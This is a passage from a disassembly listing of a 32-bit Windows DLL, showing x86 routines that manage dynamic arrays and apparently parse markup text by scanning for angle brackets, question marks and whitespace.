mov eax, [eax]
push edi
mov edi, [esp+8+Memory]
test eax, eax
jz short loc_100190F1
cmp edi, eax
jz short loc_100190F1
push eax ; Memory
call ds:free ; free
pop ecx
loc_100190F1: ; CODE XREF: sub_100190C2+21�j
; sub_100190C2+25�j
mov eax, [esi]
mov [eax], edi
mov eax, edi
pop edi
loc_100190F8: ; CODE XREF: sub_100190C2+16�j
pop esi
retn 4
sub_100190C2 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_100190FC(int, void *Memory, char)
sub_100190FC proc near ; CODE XREF: sub_1001936C+54�p
; sub_10019DAA+47�p
arg_0 = dword ptr 4
Memory = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
mov esi, ecx
push 34h ; Size
call ds:malloc ; malloc
pop ecx
mov [esi], eax
mov dword ptr [eax+30h], 1
mov ecx, [esi]
xor eax, eax
mov dl, [esp+4+arg_8]
mov [ecx], eax
mov ecx, [esi]
push [esp+4+Memory] ; Memory
mov [ecx+4], eax
mov ecx, [esi]
mov [ecx+8], eax
mov ecx, [esi]
mov [ecx+0Ch], eax
mov ecx, [esi]
mov [ecx+10h], eax
mov ecx, [esi]
mov [ecx+14h], dl
mov ecx, [esi]
mov edx, [esp+8+arg_0]
mov [ecx+18h], edx
mov ecx, [esi]
mov [ecx+1Ch], eax
mov ecx, [esi]
mov [ecx+20h], eax
mov ecx, [esi]
mov [ecx+24h], eax
mov ecx, [esi]
mov [ecx+28h], eax
mov ecx, [esi]
mov [ecx+2Ch], eax
mov ecx, esi
call sub_100190C2
mov eax, esi
pop esi
retn 0Ch
sub_100190FC endp
; =============== S U B R O U T I N E =======================================
sub_10019167 proc near ; CODE XREF: sub_1001A730+60�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_8]
push ebx
push esi
mov esi, [eax+0Ch]
push edi
add esi, [eax+8]
add esi, [eax+4]
mov eax, [eax+2Ch]
test ecx, ecx
jge short loc_10019187
or edi, 0FFFFFFFFh
jmp short loc_1001919E
; ---------------------------------------------------------------------------
loc_10019187: ; CODE XREF: sub_10019167+19�j
mov edx, [esp+0Ch+arg_4]
xor edi, edi
lea ecx, [edx+ecx*4]
cmp [eax], ecx
jz short loc_1001919E
mov edx, eax
loc_10019196: ; CODE XREF: sub_10019167+35�j
add edx, 4
inc edi
cmp [edx], ecx
jnz short loc_10019196
loc_1001919E: ; CODE XREF: sub_10019167+1E�j
; sub_10019167+2B�j
mov ecx, edi
lea ebx, [eax+edi*4]
imul ecx, 3FFFFFFFh
add ecx, esi
lea eax, [eax+edi*4+4]
shl ecx, 2
push ecx ; Size
push eax ; Src
push ebx ; Dst
call ds:memmove ; memmove
add esp, 0Ch
cmp edi, esi
jge short loc_100191E0
sub esi, edi
mov eax, ebx
add edi, esi
loc_100191C8: ; CODE XREF: sub_10019167+77�j
mov ecx, [eax]
mov edx, ecx
and edx, 3
cmp edx, [esp+0Ch+arg_4]
jnz short loc_100191DA
add ecx, 0FFFFFFFCh
mov [eax], ecx
loc_100191DA: ; CODE XREF: sub_10019167+6C�j
add eax, 4
dec esi
jnz short loc_100191C8
loc_100191E0: ; CODE XREF: sub_10019167+59�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_10019167 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100191E6(int, int, int, void *Memory, size_t Size, int)
sub_100191E6 proc near ; CODE XREF: sub_1001936C+34�p
; sub_1001947D+33�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Memory = dword ptr 14h
Size = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, [ebp+arg_8]
push [ebp+Size] ; Size
mov esi, ecx
lea eax, [edi+1]
push ebx ; int
push eax ; int
mov [ebp+var_4], esi
push [ebp+Memory] ; Memory
call sub_1001931B
mov [ebp+Memory], eax
mov eax, [esi]
lea ecx, [ebx+ebx*2]
push 4 ; Size
mov esi, [eax+0Ch]
push ecx ; int
add esi, [eax+8]
add esi, [eax+4]
lea ecx, [esi+1]
push ecx ; int
push dword ptr [eax+2Ch] ; Memory
call sub_1001931B
mov ecx, [ebp+var_4]
add esp, 20h
mov ecx, [ecx]
mov [ecx+2Ch], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [eax]
mov ebx, [ecx]
mov eax, [eax+2Ch]
test ebx, ebx
mov [ebp+arg_0], eax
jl loc_10019306
cmp ebx, esi
jge loc_10019306
mov edx, ebx
lea ecx, [eax+ebx*4]
imul edx, 3FFFFFFFh
add edx, esi
lea eax, [eax+ebx*4+4]
shl edx, 2
push edx ; Size
push ecx ; Src
push eax ; Dst
mov [ebp+arg_8], ecx
call ds:memmove ; memmove
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_14]
add esp, 0Ch
lea eax, [eax+ebx*4]
loc_1001927F: ; CODE XREF: sub_100191E6+A8�j
mov edx, [eax]
and edx, 3
cmp edx, ecx
jz short loc_10019290
inc ebx
add eax, 4
cmp ebx, esi
jl short loc_1001927F
loc_10019290: ; CODE XREF: sub_100191E6+A0�j
cmp ebx, esi
jnz short loc_100192A4
mov eax, [ebp+arg_4]
mov [eax], edi
lea eax, [ecx+edi*4]
mov ecx, [ebp+arg_0]
mov [ecx+esi*4], eax
jmp short loc_10019311
; ---------------------------------------------------------------------------
loc_100192A4: ; CODE XREF: sub_100191E6+AC�j
mov eax, [ebp+arg_0]
mov edx, [ebp+arg_8]
mov ecx, [eax+ebx*4]
lea eax, [eax+ebx*4]
inc ebx
mov [edx], ecx
cmp ebx, esi
jg short loc_100192D7
mov ecx, [ebp+arg_0]
sub esi, ebx
inc esi
lea ecx, [ecx+ebx*4]
loc_100192C0: ; CODE XREF: sub_100191E6+EF�j
mov edx, [ecx]
mov ebx, edx
and ebx, 3
cmp ebx, [ebp+arg_14]
jnz short loc_100192D1
add edx, 4
mov [ecx], edx
loc_100192D1: ; CODE XREF: sub_100191E6+E4�j
add ecx, 4
dec esi
jnz short loc_100192C0
loc_100192D7: ; CODE XREF: sub_100191E6+CF�j
mov eax, [eax]
mov ecx, [ebp+arg_4]
sar eax, 2
mov [ecx], eax
mov ecx, eax
imul ecx, [ebp+Size]
add ecx, [ebp+Memory]
sub edi, eax
imul edi, [ebp+Size]
inc eax
push edi ; Size
imul eax, [ebp+Size]
add eax, [ebp+Memory]
push ecx ; Src
push eax ; Dst
call ds:memmove ; memmove
add esp, 0Ch
jmp short loc_10019311
; ---------------------------------------------------------------------------
loc_10019306: ; CODE XREF: sub_100191E6+5F�j
; sub_100191E6+67�j
mov [ecx], edi
mov ecx, [ebp+arg_14]
lea ecx, [ecx+edi*4]
mov [eax+esi*4], ecx
loc_10019311: ; CODE XREF: sub_100191E6+BC�j
; sub_100191E6+11E�j
mov eax, [ebp+Memory]
pop edi
pop esi
pop ebx
leave
retn 18h
sub_100191E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1001931B(void *Memory, int, int, size_t Size)
sub_1001931B proc near ; CODE XREF: sub_100191E6+1D�p
; sub_100191E6+3D�p ...
Memory = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Size = dword ptr 14h
push ebp
mov ebp, esp
push edi
mov edi, [ebp+Memory]
test edi, edi
jnz short loc_10019340
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_10019334
imul eax, [ebp+Size]
push eax
jmp short loc_10019337
; ---------------------------------------------------------------------------
loc_10019334: ; CODE XREF: sub_1001931B+10�j
push [ebp+Size] ; Size
loc_10019337: ; CODE XREF: sub_1001931B+17�j
call ds:malloc ; malloc
pop ecx
jmp short loc_10019369
; ---------------------------------------------------------------------------
loc_10019340: ; CODE XREF: sub_1001931B+9�j
mov ecx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
test ecx, ecx
jz short loc_10019354
mov eax, esi
cdq
idiv ecx
test edx, edx
jnz short loc_10019366
loc_10019354: ; CODE XREF: sub_1001931B+2E�j
add esi, ecx
imul esi, [ebp+Size]
push esi ; NewSize
push edi ; Memory
call ds:realloc ; realloc
pop ecx
mov edi, eax
pop ecx
loc_10019366: ; CODE XREF: sub_1001931B+37�j
mov eax, edi
pop esi
loc_10019369: ; CODE XREF: sub_1001931B+23�j
pop edi
pop ebp
retn
sub_1001931B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1001936C(int, int, void *Memory, char, int)
sub_1001936C proc near ; CODE XREF: sub_10019709+110�p
; sub_10019709+191�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Memory = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = dword ptr 18h
mov eax, offset loc_1001D254
call _EH_prolog ; _EH_prolog
push ecx
push esi
push edi
xor edi, edi
mov esi, ecx
cmp [ebp+Memory], edi
mov [ebp+var_10], edi
jnz short loc_1001938C
push offset dword_10073FF0
jmp short loc_100193F6
; ---------------------------------------------------------------------------
loc_1001938C: ; CODE XREF: sub_1001936C+17�j
mov eax, [esi]
push edi ; int
push 4 ; Size
mov ecx, esi
push dword ptr [eax+1Ch] ; Memory
push dword ptr [eax+4] ; int
lea eax, [ebp+arg_10]
push eax ; int
push [ebp+arg_4] ; int
call sub_100191E6
mov ecx, [esi]
push dword ptr [ebp+arg_C] ; char
push [ebp+Memory] ; Memory
mov [ecx+1Ch], eax
mov eax, [esi]
mov ecx, [ebp+arg_10]
mov eax, [eax+1Ch]
mov [eax+ecx*4], edi
push dword ptr [esi] ; int
lea ecx, [ebp+Memory]
call sub_100190FC
mov ecx, [ebp+arg_10]
push eax
mov eax, [esi]
mov [ebp+var_4], edi
mov eax, [eax+1Ch]
lea ecx, [eax+ecx*4]
call sub_1001A8A2
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+Memory]
call sub_1001A728
mov eax, [esi]
inc dword ptr [eax+4]
mov eax, [esi]
mov ecx, [ebp+arg_10]
mov eax, [eax+1Ch]
lea eax, [eax+ecx*4]
push eax
loc_100193F6: ; CODE XREF: sub_1001936C+1E�j
mov ecx, [ebp+arg_0]
call sub_1001A8C7
mov ecx, [ebp+var_C]
mov eax, [ebp+arg_0]
pop edi
pop esi
mov large fs:0, ecx
leave
retn 14h
sub_1001936C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10019411(int, void *Memory, int)
sub_10019411 proc near ; CODE XREF: sub_10019709+255�p
; sub_10019709+287�p ...
arg_0 = dword ptr 8
Memory = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+Memory]
push esi
mov esi, ecx
test ebx, ebx
jz short loc_1001943B
mov eax, [esi]
test eax, eax
jnz short loc_10019442
mov esi, ds:free
push ebx ; Memory
call esi ; free
cmp [ebp+arg_8], 0
pop ecx
jz short loc_1001943B
push [ebp+arg_8] ; Memory
call esi ; free
pop ecx
loc_1001943B: ; CODE XREF: sub_10019411+C�j
; sub_10019411+22�j
mov eax, offset dword_10074008
jmp short loc_10019477
; ---------------------------------------------------------------------------
loc_10019442: ; CODE XREF: sub_10019411+12�j
push edi
mov edi, [eax+10h]
push 8 ; Size
push [ebp+arg_0] ; int
lea ecx, [edi+1]
push ecx ; int
push dword ptr [eax+28h] ; Memory
call sub_1001931B
mov ecx, [esi]
add esp, 10h
mov [ecx+28h], eax
mov eax, [esi]
mov ecx, [ebp+arg_8]
mov eax, [eax+28h]
mov [eax+edi*8], ebx
mov [eax+edi*8+4], ecx
mov esi, [esi]
lea eax, [eax+edi*8]
pop edi
inc dword ptr [esi+10h]
loc_10019477: ; CODE XREF: sub_10019411+2F�j
pop esi
pop ebx
pop ebp
retn 0Ch
sub_10019411 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1001947D(int, void *Memory, int)
sub_1001947D proc near ; CODE XREF: sub_1001967C+7D�p
arg_0 = dword ptr 4
Memory = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+Memory]
mov esi, ecx
test edi, edi
jz short loc_10019497
mov eax, [esi]
test eax, eax
jnz short loc_1001949B
push edi ; Memory
call ds:free ; free
pop ecx
loc_10019497: ; CODE XREF: sub_1001947D+A�j
xor eax, eax
jmp short loc_100194CD
; ---------------------------------------------------------------------------
loc_1001949B: ; CODE XREF: sub_1001947D+10�j
push 2 ; int
push 4 ; Size
push dword ptr [eax+20h] ; Memory
mov ecx, esi
push dword ptr [eax+8] ; int
lea eax, [esp+18h+arg_8]
push eax ; int
push [esp+1Ch+arg_0] ; int
call sub_100191E6
mov ecx, [esi]
mov [ecx+20h], eax
mov eax, [esi]
mov ecx, [esp+8+arg_8]
mov eax, [eax+20h]
mov [eax+ecx*4], edi
mov esi, [esi]
mov eax, edi
inc dword ptr [esi+8]
loc_100194CD: ; CODE XREF: sub_1001947D+1C�j
pop edi
pop esi
retn 0Ch
sub_1001947D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100194D2(int, void *Memory, int, int, int)
sub_100194D2 proc near ; CODE XREF: sub_1001954D+90�p
arg_0 = dword ptr 8
Memory = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Memory]
mov esi, ecx
test edi, edi
jz short loc_100194EE
mov eax, [esi]
test eax, eax
jnz short loc_100194F5
push edi ; Memory
call ds:free ; free
pop ecx
loc_100194EE: ; CODE XREF: sub_100194D2+C�j
mov eax, offset dword_10073FF8
jmp short loc_10019547
; ---------------------------------------------------------------------------
loc_100194F5: ; CODE XREF: sub_100194D2+12�j
push 3 ; int
push 0Ch ; Size
push dword ptr [eax+24h] ; Memory
mov ecx, esi
push dword ptr [eax+0Ch] ; int
lea eax, [ebp+arg_10]
push eax ; int
push [ebp+arg_0] ; int
call sub_100191E6
mov ecx, [esi]
mov [ecx+24h], eax
mov ecx, [esi]
mov eax, [ebp+arg_10]
mov ecx, [ecx+24h]
lea eax, [eax+eax*2]
lea eax, [ecx+eax*4]
mov ecx, [ebp+arg_8]
test ecx, ecx
mov [eax], edi
jnz short loc_1001952F
mov ecx, off_10023EF0
loc_1001952F: ; CODE XREF: sub_100194D2+55�j
mov edx, [ebp+arg_C]
test edx, edx
jnz short loc_1001953C
mov edx, off_10023EF8
loc_1001953C: ; CODE XREF: sub_100194D2+62�j
mov [eax+4], ecx
mov [eax+8], edx
mov esi, [esi]
inc dword ptr [esi+0Ch]
loc_10019547: ; CODE XREF: sub_100194D2+21�j
pop edi
pop esi
pop ebp
retn 14h
sub_100194D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1001954D(size_t Size, int)
sub_1001954D proc near ; CODE XREF: sub_10019709+AA�p
var_4 = dword ptr -4
Size = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+Size]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebx]
mov eax, [esi]
add edi, [ebx+8]
cmp eax, off_10023EFC
mov [ebp+var_4], ecx
jnz short loc_100195A1
mov cl, [edi]
mov eax, edi
loc_10019570: ; CODE XREF: sub_1001954D+42�j
test cl, cl
jz short loc_100195E6
cmp cl, 3Ch
jz short loc_10019591
cmp cl, 3Eh
jz short loc_100195AD
mov edx, off_10023F80
movzx ecx, cl
movsx ecx, byte ptr [ecx+edx]
add eax, ecx
mov cl, [eax]
jmp short loc_10019570
; ---------------------------------------------------------------------------
loc_10019591: ; CODE XREF: sub_1001954D+2A�j
mov eax, off_10023F84
mov [esi+8], eax
push off_10023F84
jmp short loc_100195A4
; ---------------------------------------------------------------------------
loc_100195A1: ; CODE XREF: sub_1001954D+1D�j
push dword ptr [esi+8]
loc_100195A4: ; CODE XREF: sub_1001954D+52�j
push edi
call ds:_mbsstr ; _mbsstr
pop ecx
pop ecx
loc_100195AD: ; CODE XREF: sub_1001954D+2F�j
test eax, eax
jz short loc_100195E6
push dword ptr [esi+8] ; Str
sub eax, edi
mov [ebp+Size], eax
call strlen ; strlen
add eax, [ebp+Size]
pop ecx
push 0FFFFFFFFh ; int
add [ebx+8], eax
push dword ptr [esi+8] ; int
push dword ptr [esi] ; int
push [ebp+Size] ; Size
push edi ; Src
call sub_10018D0C
pop ecx
pop ecx
mov ecx, [ebp+var_4]
push eax ; Memory
push 32h ; int
call sub_100194D2
xor al, al
jmp short loc_100195EF
; ---------------------------------------------------------------------------
loc_100195E6: ; CODE XREF: sub_1001954D+25�j
; sub_1001954D+62�j
mov dword ptr [ebx+10h], 8
mov al, 1
loc_100195EF: ; CODE XREF: sub_1001954D+97�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_1001954D endp
; =============== S U B R O U T I N E =======================================
sub_100195F6 proc near ; CODE XREF: sub_10019709+406�p
; sub_10019709+465�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, ds:realloc
mov eax, [esi+2Ch]
test eax, eax
jz short loc_1001961E
mov ecx, [esi+0Ch]
add ecx, [esi+8]
add ecx, [esi+4]
shl ecx, 2
push ecx ; NewSize
push eax ; Memory
call edi ; realloc
pop ecx
mov [esi+2Ch], eax
pop ecx
loc_1001961E: ; CODE XREF: sub_100195F6+11�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_10019634
mov ecx, [esi+4]
shl ecx, 2
push ecx ; NewSize
push eax ; Memory
call edi ; realloc
pop ecx
mov [esi+1Ch], eax
pop ecx
loc_10019634: ; CODE XREF: sub_100195F6+2D�j
mov eax, [esi+28h]
test eax, eax
jz short loc_1001964A
mov ecx, [esi+10h]
shl ecx, 3
push ecx ; NewSize
push eax ; Memory
call edi ; realloc
pop ecx
mov [esi+28h], eax
pop ecx
loc_1001964A: ; CODE XREF: sub_100195F6+43�j
mov eax, [esi+20h]
test eax, eax
jz short loc_10019660
mov ecx, [esi+8]
shl ecx, 2
push ecx ; NewSize
push eax ; Memory
call edi ; realloc
pop ecx
mov [esi+20h], eax
pop ecx
loc_10019660: ; CODE XREF: sub_100195F6+59�j
mov ecx, [esi+24h]
test ecx, ecx
jz short loc_10019679
mov eax, [esi+0Ch]
lea eax, [eax+eax*2]
shl eax, 2
push eax ; NewSize
push ecx ; Memory
call edi ; realloc
pop ecx
mov [esi+24h], eax
pop ecx
loc_10019679: ; CODE XREF: sub_100195F6+6F�j
pop edi
pop esi
retn
sub_100195F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001967C proc near ; CODE XREF: sub_10019709+98�p
; sub_10019709+CA�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push edi
mov edi, [ebp+arg_0]
mov [ebp+var_4], ecx
mov ecx, [edi+4]
test ecx, ecx
jz short loc_10019702
mov al, byte_10023EED
push esi
mov esi, [ebp+arg_4]
test al, al
jz short loc_100196B8
loc_1001969B: ; CODE XREF: sub_1001967C+3A�j
mov dl, [ecx]
cmp dl, 0Ah
jz short loc_100196B1
cmp dl, 20h
jz short loc_100196B1
cmp dl, 9
jz short loc_100196B1
cmp dl, 0Dh
jnz short loc_100196B8
loc_100196B1: ; CODE XREF: sub_1001967C+24�j
; sub_1001967C+29�j ...
cmp ecx, esi
jz short loc_100196B8
inc ecx
jmp short loc_1001969B
; ---------------------------------------------------------------------------
loc_100196B8: ; CODE XREF: sub_1001967C+1D�j
; sub_1001967C+33�j ...
sub esi, ecx
mov edx, esi
pop esi
jz short loc_100196FE
test al, al
jz short loc_100196DA
loc_100196C3: ; CODE XREF: sub_1001967C+4F�j
; sub_1001967C+53�j ...
dec edx
jz short loc_100196D9
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_100196C3
cmp al, 20h
jz short loc_100196C3
cmp al, 9
jz short loc_100196C3
cmp al, 0Dh
jz short loc_100196C3
loc_100196D9: ; CODE XREF: sub_1001967C+48�j
inc edx
loc_100196DA: ; CODE XREF: sub_1001967C+45�j
test edx, edx
jz short loc_100196FE
push edi ; int
push edx ; int
push ecx ; Memory
call sub_10018E33
add esp, 0Ch
test eax, eax
jnz short loc_100196F1
mov al, 1
jmp short loc_10019704
; ---------------------------------------------------------------------------
loc_100196F1: ; CODE XREF: sub_1001967C+6F�j
mov ecx, [ebp+var_4]
push 0FFFFFFFFh ; int
push eax ; Memory
push 32h ; int
call sub_1001947D
loc_100196FE: ; CODE XREF: sub_1001967C+41�j
; sub_1001967C+60�j
and dword ptr [edi+4], 0
loc_10019702: ; CODE XREF: sub_1001967C+10�j
xor al, al
loc_10019704: ; CODE XREF: sub_1001967C+73�j
pop edi
leave
retn 8
sub_1001967C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10019709(size_t Size)
sub_10019709 proc near ; CODE XREF: sub_10019709+142�p
; sub_10019DAA+77�p
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Src = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
Size = dword ptr 8
mov eax, offset loc_1001D278
call _EH_prolog ; _EH_prolog
sub esp, 30h
push ebx
xor eax, eax
push esi
push edi
mov [ebp+var_14], ecx
mov [ebp+Src], eax
mov [ebp+var_10], eax
mov [ebp+var_1C], eax
mov esi, [ebp+Size]
mov [ebp+var_4], eax
mov [ebp+var_24], eax
cmp [esi+24h], eax
jz short loc_10019741
mov [esi+24h], eax
mov [ebp+var_28], 1
jmp short loc_10019744
; ---------------------------------------------------------------------------
loc_10019741: ; CODE XREF: sub_10019709+2A�j
mov [ebp+var_28], eax
loc_10019744: ; CODE XREF: sub_10019709+36�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+Size]
push eax
push esi
call sub_10019BC6
add esp, 0Ch
mov edi, eax
mov eax, [ebp+var_18]
mov ebx, edx
push 9
mov [ebp+var_3C], edi
pop edx
cmp eax, edx
jz loc_10019A54
jmp short loc_1001976F
; ---------------------------------------------------------------------------
loc_1001976C: ; CODE XREF: sub_10019709+345�j
push 9
pop edx
loc_1001976F: ; CODE XREF: sub_10019709+61�j
mov ecx, [ebp+var_28]
sub ecx, 0
jz loc_100198D2
dec ecx
jnz loc_10019A30 ; default
mov ecx, eax
dec ecx
dec ecx
jz short loc_100197C5
dec ecx
jz loc_10019A91
sub ecx, 3
jz short loc_100197C5
dec ecx
dec ecx
jnz loc_10019A30 ; default
mov ecx, [ebp+var_14]
push ebx
push esi
call sub_1001967C
test al, al
jnz loc_10019ADB
mov ecx, [ebp+var_14]
push edi ; int
push esi ; Size
call sub_1001954D
test al, al
jnz loc_10019ADB
jmp loc_10019A28
; ---------------------------------------------------------------------------
loc_100197C5: ; CODE XREF: sub_10019709+7D�j
; sub_10019709+89�j
mov ecx, [ebp+var_14]
cmp eax, 6
setz al
push ebx
push esi
mov [ebp+var_2C], al
call sub_1001967C
test al, al
jnz loc_10019ADB
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+Size]
push eax
push esi
call sub_10019BC6
xor edi, edi
add esp, 0Ch
cmp [ebp+var_18], edi
mov [ebp+var_3C], eax
jnz loc_10019B17
push 0FFFFFFFFh ; int
push dword ptr [ebp+var_2C] ; char
push [ebp+Size] ; Size
push edx ; Src
call sub_10018D0C
pop ecx
pop ecx
mov ecx, [ebp+var_14]
push eax ; Memory
lea eax, [ebp+var_30]
push 32h ; int
push eax ; int
call sub_1001936C
push eax
lea ecx, [ebp+var_1C]
mov byte ptr [ebp+var_4], 1
call sub_1001A8A2
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_30]
call sub_1001A728
loc_10019837: ; CODE XREF: sub_10019709+1B2�j
; sub_10019709+1C4�j
lea ecx, [ebp+var_1C]
call sub_1001AAEC
test al, al
jnz loc_10019A30 ; default
push esi ; Size
lea ecx, [ebp+var_1C]
call sub_10019709
test eax, eax
jz loc_10019ADB
xor edi, edi
cmp [esi+18h], edi
jnz loc_10019B20
cmp [esi+20h], edi
jz short loc_100198C0
mov ebx, [ebp+var_14]
push dword ptr [esi+1Ch] ; int
mov eax, [ebx]
push dword ptr [eax] ; Str
call sub_1001906B
pop ecx
test al, al
pop ecx
jz loc_10019B46
push 0FFFFFFFFh ; int
push edi ; char
push dword ptr [esi+20h] ; Size
push dword ptr [esi+1Ch] ; Src
call sub_10018D0C
pop ecx
pop ecx
push eax ; Memory
lea eax, [ebp+var_34]
push 32h ; int
push eax ; int
mov ecx, ebx
call sub_1001936C
push eax
lea ecx, [ebp+var_1C]
mov byte ptr [ebp+var_4], 2
call sub_1001A8A2
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_34]
call sub_1001A728
mov [esi+20h], edi
jmp loc_10019837
; ---------------------------------------------------------------------------
loc_100198C0: ; CODE XREF: sub_10019709+15D�j
push offset dword_10073FF0
lea ecx, [ebp+var_1C]
call sub_1001A8A2
jmp loc_10019837
; ---------------------------------------------------------------------------
loc_100198D2: ; CODE XREF: sub_10019709+6C�j
mov ecx, [ebp+var_24]
xor edi, edi
sub ecx, edi
jz loc_10019A03
dec ecx
jz loc_1001996C
dec ecx
jnz loc_10019A30 ; default
cmp eax, edi
jl loc_10019A30 ; default
cmp eax, 1
jle short loc_10019908
cmp eax, 8
jle loc_10019B4B
jmp loc_10019A30 ; default
; ---------------------------------------------------------------------------
loc_10019908: ; CODE XREF: sub_10019709+1EF�j
mov edi, [ebp+var_14]
mov ecx, [edi]
cmp byte ptr [ecx+14h], 0
jz short loc_10019920
mov ecx, [ebp+Size]
cmp byte ptr [ebx+ecx-1], 3Fh
jnz short loc_10019920
dec [ebp+Size]
loc_10019920: ; CODE XREF: sub_10019709+208�j
; sub_10019709+212�j
cmp [ebp+var_10], 0
jz short loc_10019963
cmp eax, 1
jnz short loc_10019930
inc ebx
sub [ebp+Size], 2
loc_10019930: ; CODE XREF: sub_10019709+220�j
test ebx, ebx
mov eax, ebx
jz short loc_1001994B
push esi ; int
push [ebp+Size] ; int
push ebx ; Memory
call sub_10018E33
add esp, 0Ch
test eax, eax
jz loc_10019A72
loc_1001994B: ; CODE XREF: sub_10019709+22B�j
push eax ; int
push [ebp+var_10] ; Size
push [ebp+Src] ; Src
call sub_10018D0C
pop ecx
pop ecx
push eax ; Memory
push 32h ; int
mov ecx, edi
call sub_10019411
loc_10019963: ; CODE XREF: sub_10019709+21B�j
and [ebp+var_24], 0
jmp loc_10019A30 ; default
; ---------------------------------------------------------------------------
loc_1001996C: ; CODE XREF: sub_10019709+1D7�j
cmp eax, 8 ; switch 9 cases
ja loc_10019A30 ; default
jmp ds:off_10019B7E[eax*4] ; switch jump
loc_1001997C: ; DATA XREF: .text:off_10019B7E�o
push edi ; jumptable 10019975 case 0
push [ebp+var_10] ; Size
push [ebp+Src] ; Src
call sub_10018D0C
pop ecx
pop ecx
mov ecx, [ebp+var_14]
push eax ; Memory
push 32h ; int
call sub_10019411
mov eax, [ebp+Size]
mov [ebp+Src], ebx
mov [ebp+var_10], eax
jmp loc_10019A30 ; default
; ---------------------------------------------------------------------------
loc_100199A3: ; CODE XREF: sub_10019709+26C�j
; DATA XREF: .text:off_10019B7E�o
mov ecx, [esi+8] ; jumptable 10019975 cases 4,7
mov edi, [ebp+var_14]
add ecx, [esi]
mov [esi+4], ecx
mov ecx, [edi]
cmp byte ptr [ecx+14h], 0
jz short loc_100199C6
mov ecx, [ebp+Src]
mov edx, [ebp+var_10]
cmp byte ptr [edx+ecx-1], 3Fh
jnz short loc_100199C6
dec [ebp+var_10]
loc_100199C6: ; CODE XREF: sub_10019709+2AB�j
; sub_10019709+2B8�j
cmp [ebp+var_10], 0
jz short loc_100199E8
push 0 ; int
push [ebp+var_10] ; Size
push [ebp+Src] ; Src
call sub_10018D0C
pop ecx
pop ecx
push eax ; Memory
push 32h ; int
mov ecx, edi
call sub_10019411
mov eax, [ebp+var_18]
loc_100199E8: ; CODE XREF: sub_10019709+2C1�j
cmp eax, 7
jz loc_10019B0D
mov [ebp+var_28], 1
jmp short loc_10019A30 ; default
; ---------------------------------------------------------------------------
loc_100199FA: ; CODE XREF: sub_10019709+26C�j
; DATA XREF: .text:off_10019B7E�o
mov [ebp+var_24], 2 ; jumptable 10019975 case 5
jmp short loc_10019A30 ; default
; ---------------------------------------------------------------------------
loc_10019A03: ; CODE XREF: sub_10019709+1D0�j
cmp eax, 8 ; switch 9 cases
ja short loc_10019A30 ; default
jmp ds:off_10019BA2[eax*4] ; switch jump
loc_10019A0F: ; DATA XREF: .text:off_10019BA2�o
mov eax, [ebp+Size] ; jumptable 10019A08 case 0
mov [ebp+Src], ebx
mov [ebp+var_10], eax
mov [ebp+var_24], 1
jmp short loc_10019A30 ; default
; ---------------------------------------------------------------------------
loc_10019A21: ; CODE XREF: sub_10019709+2FF�j
; DATA XREF: .text:off_10019BA2�o
mov [ebp+var_28], 1 ; jumptable 10019A08 case 4
loc_10019A28: ; CODE XREF: sub_10019709+B7�j
mov eax, [esi+8]
add eax, [esi]
mov [esi+4], eax
loc_10019A30: ; CODE XREF: sub_10019709+73�j
; sub_10019709+8D�j ...
lea eax, [ebp+var_18] ; default
push eax
